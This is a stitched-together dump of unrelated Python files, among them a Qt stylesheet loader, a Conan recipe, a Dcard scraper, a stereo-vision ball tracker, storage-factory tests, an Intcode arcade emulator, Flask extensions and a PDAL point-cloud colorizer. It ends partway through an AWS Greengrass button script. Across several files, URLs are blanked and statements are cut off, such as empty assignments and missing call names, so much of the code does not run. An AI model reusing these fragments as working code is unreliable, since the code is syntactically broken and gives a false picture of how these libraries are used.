<filename>qtpyvcp/widgets/qtdesigner/ # Copyright (c) 2017-2018, SLAC National Accelerator Laboratory # This file has been adapted from PyDM, and can be redistributed and/or # modified in accordance with terms in conditions set forth in the BSD # 3-Clause License. You can find the complete licence text in the LICENCES # directory. # Links: # PyDM Project: # PyDM Licence: """"Utility to handle importing the global stylesheet for QtPyVCP widgets. """ import os from qtpy.QtWidgets import QApplication # Set up logging from qtpyvcp.utilities import logger LOG = logger.getLogger(__name__) # Fallback global stylesheet if there is no global stylesheet provided via env # variable or command line parameter GLOBAL_STYLESHEET = os.path.realpath( os.path.join( os.path.dirname(os.path.realpath(__file__)), '..', 'default_stylesheet.qss' ) ) __style_data = None def clear_cache(): """Clear the cache for stylesheet data""" global __style_data __style_data = None def apply_stylesheet(stylesheet_file_path=None, widget=None): """Apply a stylesheet to the current Qt Designer form (a .ui file). Args: stylesheet_file_path (str) : The full path to a global CSS stylesheet file widget (QWidget) : The widget in which we want to apply the stylesheet. """ # Load style data from the stylesheet file. Otherwise, the fallback is # already in place, i.e. QtPyVCP will be using the data from the global # stylesheet style = _get_style_data(stylesheet_file_path) if not style: return if not widget: widget = QApplication.instance() widget.setStyleSheet(style) def _get_style_data(stylesheet_file_path=None): """Read the global stylesheet file and provide the style data as a str. Args: stylesheet_file_path (str) : The path to the global stylesheet. Returns: str : The style data read from the stylesheet file """ global __style_data if not stylesheet_file_path: stylesheet_file_path = os.getenv("QSS_STYLESHEET", None) if stylesheet_file_path == "": stylesheet_file_path = None if __style_data: return __style_data __style_data = None load_default = True if stylesheet_file_path is not None: try: with open(stylesheet_file_path, 'r') as stylesheet_file: "Opening style file '{0}'...".format(stylesheet_file_path)) __style_data = load_default = False except Exception as ex: __style_data = None LOG.error( "Error reading the stylesheet file '{0}'. Exception: {1}".format( stylesheet_file_path, str(ex))) if load_default: try: with open(GLOBAL_STYLESHEET, 'r') as default_stylesheet:"Opening the default stylesheet '{0}'...".format( GLOBAL_STYLESHEET)) __style_data = except Exception as ex: __style_data = None LOG.exception("Cannot find the default stylesheet file '{0}'.".format(GLOBAL_STYLESHEET)) return __style_data
<gh_stars>1-10 from conans import ConanFile, tools, CMake import os required_conan_version = ">=1.38.0" class ImathConan(ConanFile): name = "imath" description = "Imath is a C++ and python library of 2D and 3D vector, matrix, and math operations for computer graphics." topics = "conan", "imath", "python", "vfx" homepage = "" license = "BSD-3-Clause" url = "" settings = ( "os", "arch", "compiler", "build_type", "python", ) generators = "cmake_find_package_multi" _cmake = None _source_subfolder = "source_subfolder" def _is_dummy(self): return tools.Version(self.version) < "3" def requirements(self): if self._is_dummy(): return self.requires(f"python/(latest)@{self.user}/{}") self.requires(f"boost/(latest)@{self.user}/{}") def build_requirements(self): if self._is_dummy(): return self.build_requires(f"cmake/(latest)@{self.user}/{}") def source(self): if self._is_dummy(): with open("imath-2-is-a-dummy-package.txt", "w") as f: f.write( "Imath only contains data starting from version 3. Use OpenEXR-2 for Imath-2" ) else: tools.get( f"{self.version}.tar.gz" ) os.rename(f"Imath-{self.version}", self._source_subfolder) def _configure_cmake(self): if self._cmake: return self._cmake with tools.environment_append(tools.RunEnvironment(self).vars): self._cmake = CMake(self) self._cmake.definitions["PYTHON"] = "ON" self._cmake.configure(source_folder=self._source_subfolder) return self._cmake def build(self): if not self._is_dummy(): cmake = self._configure_cmake() def package(self): if self._is_dummy(): self.copy("imath-2-is-a-dummy-package.txt") else: self.copy("", src=self._source_subfolder, dst="licenses") cmake = self._configure_cmake() cmake.install() def package_info(self): if self._is_dummy(): self.user_info.is_dummy = True return self.user_info.is_dummy = False self.cpp_info.requires.append("python::PythonLibs") self.cpp_info.requires.append("boost::python") pymajorminor = self.deps_user_info["python"].python_interp self.env_info.PYTHONPATH.append( os.path.join(self.package_folder, "lib", pymajorminor, "site-packages") ) self.env_info.CMAKE_PREFIX_PATH.append( os.path.join(self.package_folder, "lib", "cmake") )
# -*- coding: utf-8 -*- """ Created on Mon Jul 1 23:11:03 2019 @author: Relieak """ ''' DCARD 熱門前30文章搜尋 純用 BeautifulSoup 寫法 ''' from bs4 import BeautifulSoup import requests import re url = "" html = requests.get(url) html.encoding = "utf-8" #print(html.text) sp = BeautifulSoup(html.text,"html.parser") #print(sp.prettify()) #排版後更容易分析 #data =".PostEntry_root_V6g0rd") data =".PostList_entry_1rq5Lf") #若要搜尋標簽中的內容 必須先搜尋上一個標籤 否則會找不到 ex : href 先<div 不能先<a #print(data[0]) #for link in data[1].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) : # # #print(link) # # http = link.get("href") # # print("" %(http)) while True : try : number = input("~~~歡迎來到Dcard 前30熱門文章搜尋~~~\n""\n你想看第幾則文章(離開 請按Enter)>> ") if number == "" : break elif 0 < int(number) <= 30 : try : for i in range(int(number)-1,int(number)) : data1 = data[i].find_all("h3",{"class" : "Title__Text-v196i6-0 gmfDU"}) data2 = data[i].find_all("div",{"class" : "PostEntry_excerpt_2eHlNn"}) data3 = data[i].find_all("div",{"class" : "ActionBar__LikeCount-pwz3il-1 cGEHtj"}) data4 = data[i].find_all("span",{"class" : "ActionBar__CommentWrapper-pwz3il-5 hkpJwJ"}) data5 = data[i].find_all("span",{"class" : "Header__PublishedDateTime-xvcbwe-3 MDszy"}) print("") print("第%d則" %(int(number))) print("標題 :",data1[0].text) print("簡介 :",data2[0].text) print("表達心情數 :",data3[0].text) # .strip() 方法用於移除字符串頭尾指定的字符(默認為空格或換行符)或字符序列 -->文字<-- print("回應數 :",data4[0].text.strip("回應")) print("發表時間 :",data5[0].text) # 搜尋標簽中的內容的方法 #href for link in data[i].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) : http = link.get("href") #print(http) #正規表示法 A = re.compile("[0-9]+") #表示任意數字串 B = re.compile("[A-Za-z0-9\./_]+") #表達任意數字,任意英文字母和底線字元的組合,也可寫成 \w # search(string)的用法是傳回第一組符合正規表示法的字串 Search1 = Search2 = #去掉網址後面的中文字 #print(Search1) #print(Search2) print("文章ID :", #傳回儲存在match物件中的值 group() print("網頁 :" %( print("") except : """ 若文章簡介開頭是 "前情提要" 會搜尋不到內文 "PostEntry_excerpt_2eHlNn" 產生錯誤 須去搜尋 "PostEntry_reply_1oU-6z" """ data2 = data[i].find_all("div",{"class" : "PostEntry_reply_1oU-6z"}) data3 = data[i].find_all("div",{"class" : "ActionBar__LikeCount-pwz3il-1 cGEHtj"}) data4 = data[i].find_all("span",{"class" : "ActionBar__CommentWrapper-pwz3il-5 hkpJwJ"}) data5 = data[i].find_all("span",{"class" : "Header__PublishedDateTime-xvcbwe-3 MDszy"}) print("簡介 :",data2[0].text) print("表達心情數 :",data3[0].text) print("回應數 :",data4[0].text.strip("回應")) print("發表時間 :",data5[0].text) for link in data[i].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) : http = link.get("href") A = re.compile("[0-9]+") B = re.compile("[A-Za-z0-9\./_]+") Search1 = Search2 = print("文章ID :", print("網頁 :" %( print("") else : print("") print("只能搜尋前30篇文章喔!!") except : print("") print("輸入錯誤請重新輸入!!!")
<filename>src/vision/ from logging import config import threading, cv2, time, json from .stereocam import StereoCam from .vision_config import BallConfig, StereoConfig, MonocularConfig from . import preprocessing, trajectory_estimation, monocular class Stereo(monocular.Monocular): def __init__(self, publisher_func, mode: str = "all", trajectory = None): # mode determines if a trajectory is calculated StereoCam = StereoCam(StereoCam.set_depth_rs_config()) self.publisher_func:function = publisher_func self.mode = mode self.trajectory = trajectory def main_loop(self): #TODO while self.loop_running: self.image_id += 1 if self.debug_mode: self.debug_currrent = True #Tells image saver that it can start saving images raw_frame, timestamp = preprocessed_frame = self.preprocess(raw_frame) moment_result = trajectory_estimation.get_target_pixel_position_moment(preprocessed_frame) if moment_result is False: #print(f"Invalid Moment: Image {self.image_id}") #Fires if image has no ball continue pixel_coords, mass, pixel_diameter = moment_result if mass<StereoConfig.min_mass: #print(f"Mass {mass}") #Fires if image is too small continue #TODO this should remove incomplete detections if not (preprocessed_frame[pixel_coords[1],-1] == 0 and preprocessed_frame[pixel_coords[1],0] == 0 and preprocessed_frame[0,pixel_coords[0]] == 0 and preprocessed_frame[-1,pixel_coords[0]] == 0): print("Incomplete Ball") continue #print(pixel_coords) # draw the center and diameter of the circle com_frame = cv2.applyColorMap(cv2.convertScaleAbs(raw_frame, alpha=0.03), cv2.COLORMAP_JET) com_frame =,pixel_coords,2,(0,0,255),3) com_frame =,pixel_coords,int(pixel_diameter/2),(0,0,255),3) self.save_image(com_frame, "com_frame") if self.mode == "all": #TODO distance = raw_frame[pixel_coords[1]][pixel_coords[0]]+BallConfig.ball_diameter*1000/2 cartestian_coord_camera_frame =, distance) cartestian_coord_world_frame = self.transform_camera_frame_to_world_frame(cartestian_coord_camera_frame) self.last_update_type = self.mode self.last_update = time.time() self.pixel_coords = pixel_coords self.pixel_diameter = pixel_diameter self.norm_coords = (0,0) self.distance = distance self.cartesian_coords = cartestian_coord_world_frame coords = cartestian_coord_world_frame self.coord = {"x":coords[0],"y":coords[1],"z":coords[2], "timestamp":timestamp} #print(self.distance) #TODO DEBUG self.publisher_func(self) #TODO call this after updating self if self.debug_mode and self.debug_type == "oneshot": self.debug_mode = False self.debug_currrent = False def preprocess(self, raw_frame): #Save raw image self.save_image(raw_frame, "raw_frame") #Crop frame cropped_frame = preprocessing.crop(raw_frame, StereoConfig.crop_topleft, StereoConfig.crop_bottomright) self.save_image(cropped_frame, "cropped_frame") #Distance crop distance_cropped_frame = preprocessing.distance_crop(cropped_frame, StereoConfig.dist_crop_min, StereoConfig.dist_crop_max) self.save_image(distance_cropped_frame, "distance_cropped_frame") #Remove disconnected masses opened_frame = preprocessing.morph_open(distance_cropped_frame, StereoConfig.open_kernal_size) self.save_image(opened_frame, "opened_frame") #Fill holes in ball closed_frame = preprocessing.morph_close(opened_frame, StereoConfig.close_kernal_size) self.save_image(closed_frame, "closed_frame") #Threshold to binary thresholded_frame = preprocessing.stereo_threshold(closed_frame) self.save_image(thresholded_frame, "thresholded_frame") return thresholded_frame def transform_camera_frame_to_world_frame(self, coordinate): #TODO #RS local axes are defined with X right, Y down, Z towards facing direction. #These need to be converted to the same axes as robot platform uses. #X forward, Y left (TODO check positive value is left) and Z up x_l = coordinate[2]/1000 #z_rs becomes x y_l = -coordinate[0]/1000 #-x_rs becomes y z_l = -coordinate[1]/1000 #-y_rs becomes z rotaton_matrix = StereoConfig.rotation_matrix x_rotated = x_l*rotaton_matrix[0][0]+y_l*rotaton_matrix[1][0]+z_l*rotaton_matrix[2][0] y_rotated = x_l*rotaton_matrix[0][1]+y_l*rotaton_matrix[1][1]+z_l*rotaton_matrix[2][1] z_rotated = x_l*rotaton_matrix[0][2]+y_l*rotaton_matrix[1][2]+z_l*rotaton_matrix[2][2] x_translated = x_rotated-StereoConfig.camera_position[0] y_translated = y_rotated-StereoConfig.camera_position[1] z_translated = z_rotated-StereoConfig.camera_position[2] world_coord = [x_translated, y_translated, z_translated] #print(f"Coord: {[x_l, y_l, z_l]}, {world_coord:}") #print(f"{x_translated:3f},{y_translated:3f},{z_translated:3f}") return world_coord def record_singe_image_set(self): self.debug_type = "oneshot" self.debug_mode = True def save_image(self, frame, image_name): #TODO async func to save images to a file #needs to set filename based on image id at start to ensure it has not been updated. if frame is not False and image_name == "thresholded_frame": self.debug_frame_output = frame return def test_publisher_pixel_coordinate(stereo: Stereo): """Test file that saves coords to a json file for testing with traj predictor""" filename = "vision/log/coords.json" if stereo.coord is not None: with open(filename, "r+") as file: try: data = json.load(file) except: data = [] data.append(stereo.coord) json.dump(data, file) return if __name__ == "__main__": stereo = Stereo(test_publisher_pixel_coordinate) stereo.debug_mode = True stereo.debug_type = "cont" stereo.start_loop() time.sleep(2) while True: cv2.imshow("Colour Image", stereo.debug_frame_output) # Press q if you want to end the loop if cv2.waitKey(1) & 0xFF == ord('q'): break stereo.loop_running = False
<gh_stars>1-10 from django.contrib import admin from django_discord_connector.models import DiscordClient, DiscordToken, DiscordGroup, DiscordChannel, DiscordUser from django_discord_connector.tasks import sync_discord_groups from django.apps import apps def update_discord_groups(modeladmin, request, queryset): sync_discord_groups() update_discord_groups.short_description="Update Discord groups from Discord Server" # Register your models here. if apps.is_installed('django_singleton_admin'): # Highly Recommended: from django_singleton_admin.admin import DjangoSingletonModelAdmin @admin.register(DiscordClient) class DiscordClientAdmin(DjangoSingletonModelAdmin): fieldsets = ( ('General Settings', { 'fields': ('callback_url', 'server_id', 'client_id', 'client_secret', 'bot_token', 'invite_link', 'name_enforcement_schema') }), ('Advanced Settings', { 'classes': ('collapse', 'open'), 'fields': ('api_endpoint', 'base_uri', 'token_uri', 'token_revoke_uri') }), )
<gh_stars>10-100 from storefact._store_creation import create_store import pytest def test_create_store_azure(mocker): # Mock HAzureBlockBlobStore also here, becase otherwise it will try to inherit from # the mock object `mock_azure` created below, which will fail. mock_hazure = mocker.patch("storefact._hstores.HAzureBlockBlobStore") mock_azure = mocker.patch("") create_store( "azure", { "account_name": "ACCOUNT", "account_key": "KEY", "container": "cont_name", "create_if_missing": True, }, ) mock_azure.assert_called_once_with( checksum=True, conn_string="DefaultEndpointsProtocol=https;AccountName=ACCOUNT;AccountKey=KEY", container="cont_name", create_if_missing=True, max_connections=2, public=False, socket_timeout=(20, 100), max_block_size=4194304, max_single_put_size=67108864, ) mock_hazure.assert_not_called() def test_create_store_hazure(mocker): mock_hazure = mocker.patch("storefact._hstores.HAzureBlockBlobStore") create_store( "hazure", { "account_name": "ACCOUNT", "account_key": "KEY", "container": "cont_name", "create_if_missing": True, }, ) mock_hazure.assert_called_once_with( checksum=True, conn_string="DefaultEndpointsProtocol=https;AccountName=ACCOUNT;AccountKey=KEY", container="cont_name", create_if_missing=True, max_connections=2, public=False, socket_timeout=(20, 100), max_block_size=4194304, max_single_put_size=67108864, ) def test_create_store_azure_inconsistent_params(): with pytest.raises( Exception, match="create_if_missing is incompatible with the use of SAS tokens" ): create_store( "hazure", { "account_name": "ACCOUNT", "account_key": "KEY", "container": "cont_name", "create_if_missing": True, "use_sas": True, }, ) def test_create_store_hs3(mocker): mock_hs3 = mocker.patch("storefact._boto._get_s3bucket") mock_hbotostores = mocker.patch("storefact._hstores.HBotoStore") create_store( "hs3", { 'host': u'endpoint:1234', 'access_key': u'access_key', 'secret_key': u'secret_key', 'bucket': u'bucketname', }, ) mock_hs3.assert_called_once_with( host=u'endpoint:1234', access_key=u'access_key', secret_key=u'secret_key', bucket=u'bucketname', ) def test_create_store_s3(mocker): mock_s3 = mocker.patch("storefact._boto._get_s3bucket") mock_hbotostores = mocker.patch("storefact._hstores.HBotoStore") create_store( "s3", { 'host': u'endpoint:1234', 'access_key': u'access_key', 'secret_key': u'secret_key', 'bucket': u'bucketname', }, ) mock_s3.assert_called_once_with( host=u'endpoint:1234', access_key=u'access_key', secret_key=u'secret_key', bucket=u'bucketname', ) def test_create_store_hfs(mocker): mock_hfs = mocker.patch("storefact._hstores.HFilesystemStore") create_store( "hfs", { 'type': 'hfs', 'path': 'this/is/a/relative/path', 'create_if_missing': True }, ) mock_hfs.assert_called_once_with('this/is/a/relative/path') @pytest.mark.skip(reason="some issue here") def test_create_store_fs(mocker): mock_fs = mocker.patch("simplekv.fs.FilesystemStore") create_store( "fs", { 'type': 'fs', 'path': 'this/is/a/relative/fspath', 'create_if_missing': True } ) mock_fs.assert_called_once_with('this/is/a/relative/fspath') def test_create_store_mem(mocker): mock_mem = mocker.patch("simplekv.memory.DictStore") create_store( "memory", {'type': u'memory', 'wrap': u'readonly'}, ) mock_mem.assert_called_once_with() def test_create_store_hmem(mocker): mock_hmem = mocker.patch("storefact._hstores.HDictStore") create_store( "hmemory", {'type': u'memory', 'wrap': u'readonly'}, ) mock_hmem.assert_called_once_with() @pytest.mark.skip(reason="some issue here") def test_create_store_redis(mocker): mock_redis = mocker.patch("simplekv.memory.redisstore.RedisStore") mock_Strictredis = mocker.patch("redis.StrictRedis") create_store( "redis", {'type': u'redis', 'host': u'localhost', 'db': 2}, ) mock_Strictredis.assert_called_once_with() def test_create_store_valueerror(): with pytest.raises( Exception, match="Unknown store type: ABC" ): create_store( "ABC", { "account_name": "ACCOUNT", "account_key": "KEY", "container": "cont_name", "create_if_missing": True, "use_sas": True, }, )
INPUTPATH = "input.txt" #INPUTPATH = "input-test.txt" with open(INPUTPATH) as ifile: raw = program = tuple(map(int, raw.strip().split(","))) from enum import Enum class Mde(Enum): POS = 0 IMM = 1 REL = 2 from itertools import chain, repeat, islice from collections import defaultdict from typing import Dict, Callable, List, Iterable, Optional, ClassVar class Ico: liv: bool ptr: int reb: int mem: Dict[int, int] cal: Callable[[], int] log: List[int] def __init__( self, prg: Iterable[int], cal: Callable[[], int] = lambda: 0 ) -> None: self.liv = True self.ptr = 0 self.reb = 0 self.mem = defaultdict(int, enumerate(prg)) = cal self.log = list() def get(self, mde: Mde) -> int: if mde == Mde.POS: idx = self.mem[self.ptr] elif mde == Mde.IMM: idx = self.ptr elif mde == Mde.REL: idx = self.mem[self.ptr] + self.reb self.ptr += 1 return idx def ste(self) -> int: if not self.liv: return 99 val = self.mem[self.get(Mde.IMM)] opc = val % 100 mds = map(Mde, chain(map(int, reversed(str(val // 100))), repeat(0))) opr = self.ops[opc] opr(self, *map(self.get, islice(mds, opr.__code__.co_argcount - 1))) return opc def run(self) -> List[int]: while self.liv: self.ste() return self.log def add(self, idx: int, jdx: int, kdx: int) -> None: self.mem[kdx] = self.mem[idx] + self.mem[jdx] def mul(self, idx: int, jdx: int, kdx: int) -> None: self.mem[kdx] = self.mem[idx] * self.mem[jdx] def inp(self, idx: int) -> None: self.mem[idx] = def out(self, idx: int) -> None: self.log.append(self.mem[idx]) def jit(self, idx: int, jdx: int) -> None: if self.mem[idx]: self.ptr = self.mem[jdx] def jif(self, idx: int, jdx: int) -> None: if not self.mem[idx]: self.ptr = self.mem[jdx] def les(self, idx: int, jdx: int, kdx: int) -> None: self.mem[kdx] = int(self.mem[idx] < self.mem[jdx]) def equ(self, idx: int, jdx: int, kdx: int) -> None: self.mem[kdx] = int(self.mem[idx] == self.mem[jdx]) def adj(self, idx: int) -> None: self.reb += self.mem[idx] def hal(self) -> None: self.liv = False ops: ClassVar[Dict[int, Callable[..., None]]] = { 1: add, 2: mul, 3: inp, 4: out, 5: jit, 6: jif, 7: les, 8: equ, 9: adj, 99: hal } from typing import Tuple class ArcadeCabinet: ico: Ico index: int screen: Dict[Tuple[int, int], int] score: int auto: bool tile_to_char: ClassVar[Dict[int, str]] = { 0: " ", 1: "|", 2: "#", 3: "_", 4: "o" } char_to_joystick: ClassVar[Dict[str, int]] = { "a": -1, "s": 0, "d": 1 } def __init__(self, program: Iterable[int], auto: bool = True) -> None: self.ico = Ico(program) = self self.index = 0 self.screen = defaultdict(int) self.score = 0 = auto def __call__(self) -> int: self.consume_log() if return 0 else: return self.prompt_joystick() def __str__(self) -> str: indexes, jndexes = zip(*self.screen) return "\n".join( "".join( self.tile_to_char[self.screen[i, j]] for j in range(min(jndexes), max(jndexes) + 1) ) for i in range(min(indexes), max(indexes) + 1) ) def run(self) -> None: self.consume_log() def consume_log(self) -> None: while self.index < len(self.ico.log): j, i, value = self.ico.log[self.index: self.index + 3] if (j, i) == (-1, 0): self.score = value else: self.screen[i, j] = value self.index += 3 def prompt_joystick(self) -> int: print(self) msg = f"<{'|'.join(self.char_to_joystick)}>: " while (j := self.char_to_joystick.get(input(msg))) is None: pass return j demo = ArcadeCabinet(program) print(sum(1 for tile in demo.screen.values() if tile == 2)) game = ArcadeCabinet((2,) + program[1:], False) print(game.score)
# encoding: utf-8 from import ( eq_, set_trace, ) from util.cdn import cdnify class TestCDN(object): def unchanged(self, url, cdns): self.ceq(url, url, cdns) def ceq(self, expect, url, cdns): eq_(expect, cdnify(url, cdns)) def test_no_cdns(self): url = "http://foo/" self.unchanged(url, None) def test_non_matching_cdn(self): url = "" self.unchanged(url, {"" : ""}) def test_matching_cdn(self): url = "" self.ceq("", url, {"" : "", "" : ""} ) def test_s3_bucket(self): # Instead of the URL we accidentally used the full S3 # address for the bucket that hosts S3. cdnify() handles this # with no problem. url = "" self.ceq("", url, {"" : ""}) def test_relative_url(self): # By default, relative URLs are untouched. url = "/groups/" self.unchanged(url, {"" : ""}) # But if the CDN list has an entry for the empty string, that # URL is used for relative URLs. self.ceq("", url, {"" : ""})
<reponame>yiruiliu110/eegnn import torch from torch.distributions import Gamma, Dirichlet from estimation import compute_z i = [[0, 1, 1, 2], [2, 0, 2, 1]] v_graph = [1, 1, 1, 1] v_c = [0, 1, 1, 0] graph = torch.sparse_coo_tensor(i, v_graph, (3, 3)) c = torch.sparse_coo_tensor(i, v_c, (3, 3)) max_K = 10 node_number = 4 w = Gamma(concentration=1., rate=1.).sample([max_K, node_number]) * 5.0 pi = Dirichlet(torch.tensor([0.5, 0.5])).sample() z = compute_z(w, pi, c) print(z)
<filename>pyneos/ import os home_dir = os.path.expanduser('~') neos_dir = '.' # have this point to your neos directory neos_cmd = neos_dir + '/bin/neos' abc_cmd = neos_dir + '/bin/abc' abclib_path = neos_dir + '/cells/simpler.lib' neos_bench_dir = neos_dir + '/bench/'
<reponame>BDEvan5/SuperSafety import yaml import csv import os from argparse import Namespace import shutil import numpy as np from numba import njit # Admin functions def save_conf_dict(dictionary, save_name=None): if save_name is None: save_name = dictionary["agent_name"] path = dictionary["vehicle_path"] + dictionary["agent_name"] + f"/{save_name}_record.yaml" with open(path, 'w') as file: yaml.dump(dictionary, file) def load_conf(fname): full_path = "config/" + fname + '.yaml' with open(full_path) as file: conf_dict = yaml.load(file, Loader=yaml.FullLoader) conf = Namespace(**conf_dict) # np.random.seed(conf.random_seed) return conf def load_yaml_dict(fname): full_path = "config/" + fname + '.yaml' with open(full_path) as file: conf_dict = yaml.load(file, Loader=yaml.FullLoader) return conf_dict def init_file_struct(path): if os.path.exists(path): try: os.rmdir(path) except: shutil.rmtree(path) os.mkdir(path) @njit(cache=True) def limit_phi(phi): while phi > np.pi: phi = phi - 2*np.pi while phi < -np.pi: phi = phi + 2*np.pi return phi
from flask import Flask, current_app, request from flask_babelex import get_locale from flask_sqlalchemy import SQLAlchemy from flask_transalchemy.model import TranslationMixin class TransAlchemy(object): """Flask-TransAlchemy extension class. :param app: Flask application instance :param db: Flask-SQLAlchemy instance """ def __init__(self, app: Flask, db: SQLAlchemy, label_route: str = None): = app self.db = db self.model = None self.route = label_route if app is not None: self.init_app(app) def init_app(self, app: Flask): """Initialize extension and create `Translation` model class. :param app: Flask application instance """ app.extensions["babel_alchemy"] = self class Translation(self.db.Model, TranslationMixin): pass self.model = Translation if self.route: '/{}/<label>'.format(self.route), endpoint='label_translations' ) def translate(label): return self.get_label(label, **request.args) def set_label(self, label: str, value: str, language: str = None): """Save label translation in database. :param label: Label name ('attribute' field in table) :param value: Translated label text. :param language: Language of translation """ if language is None: language = str(get_locale()) translation = self.model( attribute=label, language=language, value=value ) self.db.session.add(translation) self.db.session.commit() def get_label(self, label: str, language: str = None): """Get translated label from database. Labels are stored in the table without table name and record_id. :param label: Label name ('attribute' field in table) :param language: Language of translation :return: Translated label text. """ if language is None: language = str(get_locale()) qry = self.model.query.filter_by( table=None, record_id=None, attribute=label, language=language ) translation = qry.first() if translation is None: return label return translation.value def set_label(label: str, value: str, language: str = None): """Shortcut for `BabelAlchemy.set_label()`. :param label: Label name ('attribute' field in table) :param value: Translated label text. :param language: Language of translation """ babel_alchemy = current_app.extensions.get("babel_alchemy") return babel_alchemy.set_label(label, value, language) def get_label(label: str, language: str = None): """Shortcut for `BabelAlchemy.get_label()`. Labels are stored in the table without table name and record_id. :param label: Label name ('attribute' field in table) :param language: Language of translation :return: Translated label text. """ babel_alchemy = current_app.extensions.get("babel_alchemy") return babel_alchemy.get_label(label, language)
from flask import Flask, render_template, request, url_for, redirect application = app = Flask(__name__) @app.before_request def check_for_maintenance(): if request.path != url_for('maintenance'): return redirect(url_for('maintenance')) # Or alternatively, dont redirect # return 'Sorry, off for maintenance!', 503 @app.route('/maintenance') def maintenance(): return render_template('downsite.html') # run the app. if __name__ == "__main__": # Setting debug to True enables debug output. This line should be # removed before deploying a production app.,port=8080,debug=True)
<gh_stars>1-10 # -*- coding: utf-8 -*- """ Python3 @author: <NAME> """ import sys import os import argparse import subprocess import json import math def run_pdal(path, input_path, output_path, las_srs, wms_url, wms_layer, wms_srs, wms_version, wms_format, wms_ppm, wms_max_image_size):['pdal', 'pipeline', '{}/pdal_pipeline.json'.format(path), '--readers.las.filename={}'.format(input_path), '--filters.python.script={}/'.format(path), ('--filters.python.pdalargs="{' + '\\\"wms_url\\\": \\\"{}\\\",'.format(wms_url) + '\\\"wms_layer\\\": \\\"{}\\\",'.format(wms_layer) + '\\\"wms_srs\\\": \\\"{}\\\",'.format(wms_srs) + '\\\"wms_version\\\": \\\"{}\\\",'.format(wms_version) + '\\\"wms_format\\\": \\\"{}\\\",'.format(wms_format) + '\\\"wms_ppm\\\": \\\"{}\\\",'.format(wms_ppm) + '\\\"wms_max_image_size\\\": \\\"{}\\\"}}"'.format(wms_max_image_size)), '--writers.las.filename={}'.format(output_path), '--writers.las.a_srs={}'.format(las_srs)]) def process_files(input_path, output_path, las_srs, wms_url, wms_layer, wms_srs, wms_version, wms_format, wms_ppm, wms_max_image_size, verbose=False): """ Run the pdal pipeline using the given arguments. Parameters ---------- input : str The path to the input LAS/LAZ file. output : str The path to the output LAS/LAZ file. """ path = os.path.dirname(os.path.realpath(__file__)) if os.path.isdir(input_path): for i, f in enumerate(os.listdir(input_path)): if f.endswith(".las") or f.endswith(".laz"): las = os.path.join(input_path, f).replace('\\', '/') if os.path.isdir(output_path): output_path = output_path + '/' if output_path[-1] != '/' else output_path basename, ext = os.path.splitext(f) out = '{}{}_color{}'.format(output_path, basename, ext) else: basename, ext = os.path.splitext(output_path) out = '{}_{}{}'.format(basename, i, ext) if verbose: print('Colorizing {} ..'.format(las)) run_pdal(path, las, out, las_srs, wms_url, wms_layer, wms_srs, wms_version, wms_format, wms_ppm, wms_max_image_size) else: if verbose: print('Colorizing {} ..'.format(input_path)) run_pdal(path, input_path, output_path, las_srs, wms_url, wms_layer, wms_srs, wms_version, wms_format, wms_ppm, wms_max_image_size) def argument_parser(): """ Define and return the arguments. """ description = ("Colorize a las or laz file with a WMS service. " "By default uses PDOK aerial photography.") parser = argparse.ArgumentParser(description=description) required_named = parser.add_argument_group('required named arguments') required_named.add_argument('-i', '--input', help='The input LAS/LAZ file or folder.', required=True) required_named.add_argument('-o', '--output', help='The output colorized LAS/LAZ file or folder.', required=True) parser.add_argument('-s', '--las_srs', help='The spatial reference system of the LAS data. (str, default: EPSG:28992)', required=False, default='EPSG:28992') parser.add_argument('-w', '--wms_url', help='The url of the WMS service to use. (str, default:', required=False, default='') parser.add_argument('-l', '--wms_layer', help='The layer of the WMS service to use. (str, default: Actueel_ortho25)', required=False, default='Actueel_ortho25') parser.add_argument('-r', '--wms_srs', help='The spatial reference system of the WMS data to request. (str, default: EPSG:28992)', required=False, default='EPSG:28992') parser.add_argument('-f', '--wms_format', help='The image format of the WMS data to request. (str, default: image/png)', required=False, default='image/png') parser.add_argument('-v', '--wms_version', help='The version number of the WMS service. (str, default: 1.3.0)', required=False, default='1.3.0') parser.add_argument('-p', '--wms_ppm', help='The approximate desired pixels per meter of the requested image. (int, default: 4)', required=False, default=4) parser.add_argument('-m', '--wms_max_image_size', help='The maximum size in pixels of the largest side of the requested image. (int, default: sys.maxsize)', required=False, default=sys.maxsize) parser.add_argument('-V', '--verbose', default=False, action="store_true", help='Set verbose.') args = parser.parse_args() return args def main(): args = argument_parser() process_files(args.input, args.output, args.las_srs, args.wms_url, args.wms_layer, args.wms_srs, args.wms_version, args.wms_format, args.wms_ppm, args.wms_max_image_size, args.verbose) if __name__ == '__main__': main()
from blessings import Terminal term = Terminal() class Writer(object): """ --------------------------------------------------------------------------- Create an object with a write method that writes to a specific place on the screen, defined at instantiation. This is the glue between blessings and progressbar. --------------------------------------------------------------------------- """ def __init__(self, location): """ ----------------------------------------------------------------------- Input: location - tuple of ints (x, y), the position of the bar in the terminal ----------------------------------------------------------------------- """ self.location = location def write(self, string): with term.location(*self.location): print(string)
from unittest.mock import Mock import pytest from {{cookiecutter.project_slug}}.graphql.resolvers import resolve_query_hello @pytest.mark.asyncio async def test_resolve_query_hello(): result = await resolve_query_hello( None, {"name": "{{cookiecutter.author_name}}"}, {}, Mock() ) assert result == "Hello {{cookiecutter.author_name}}!"
#!/usr/bin/env python # Copyright 2017, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may not # use this file except in compliance with the License. A copy of the License is # located at # # # or in the "license" file accompanying this file. This file is distributed on # an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. """ GGD Button This GGD will send "green", "red", or "white" button messages. """ import os import json import time import socket import argparse import datetime import logging from gpiozero import PWMLED, Button from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient, DROP_OLDEST from AWSIoTPythonSDK.core.greengrass.discovery.providers import \ DiscoveryInfoProvider import utils from gg_group_setup import GroupConfigFile dir_path = os.path.dirname(os.path.realpath(__file__)) log = logging.getLogger('button') handler = logging.StreamHandler() formatter = logging.Formatter( '%(asctime)s|%(name)-8s|%(levelname)s: %(message)s') handler.setFormatter(formatter) log.addHandler(handler) log.setLevel(logging.INFO) GGD_BUTTON_TOPIC = "button" hostname = socket.gethostname() green_led = PWMLED(4) green_button = Button(5) red_led = PWMLED(17) red_button = Button(6) white_led = PWMLED(27) white_button = Button(13) mqttc = None ggd_name = None def button(sensor_id, toggle): now = if toggle: val = 